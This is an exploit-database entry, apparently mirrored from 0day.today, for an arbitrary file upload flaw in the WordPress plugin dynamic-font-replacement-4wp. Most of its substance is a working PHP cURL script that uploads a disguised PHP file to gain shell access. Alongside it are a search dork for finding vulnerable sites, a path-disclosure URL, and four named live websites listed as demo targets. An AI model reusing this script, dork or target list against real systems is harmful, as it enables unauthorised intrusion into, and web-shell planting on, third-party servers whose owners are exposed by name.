Lucene search
K

Wordpress plugin dynamic-font-replacement-4wp Arbitrary File Upload

🗓️ 05 Feb 2013 00:00:00Reported by The Black DevilsType 
zdt
 zdt
🔗 0day.today👁 27 Views

Wordpress plugin dynamic-font-replacement-4wp Arbitrary File Upload vulnerability - 21/01/201

Code
# Exploit Title: Wordpress plugin dynamic-font-replacement-4wp Arbitrary File Upload /FPD Vulnerability
# Date: 21/01/2013
# Author: The Black Devils
# Home: 1337day Exploit DataBase 1337day.com
# Category : [ webapps ]
# Dork : inurl:wp-content/plugins/dynamic-font-replacement-4wp
# Type : php
# Tested on: [Windows] & [Ubuntu]
#------------------
Upload 

<?php
$uploadfile="cyber.php.gif";
$ch = curl_init("http://localhost/wp-content/plugins/dynamic-font-replacement-4wp/admin/upload2.php");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://localhost/wp-content/plugins/dynamic-font-replacement-4wp/admin/cyber.gif.php
<?php
phpinfo();
?>

FULL PATH Discolure

http://localhost/wp-content/plugins/dynamic-font-replacement-4wp/admin/filedelete.php
#------------------
Demo 
http://charlestonsole.com/wp-content/plugins/dynamic-font-replacement-4wp/admin/upload2.php
http://www.dogstarcharleston.com/wp-content/plugins/dynamic-font-replacement-4wp/admin/upload2.php
http://www.gameworldone.com/wp-content/plugins/dynamic-font-replacement-4wp/admin/upload2.php
http://kroekerfarms.com/wp-content/plugins/dynamic-font-replacement-4wp/admin/upload2.php


#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------

#  0day.today [2018-04-01]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation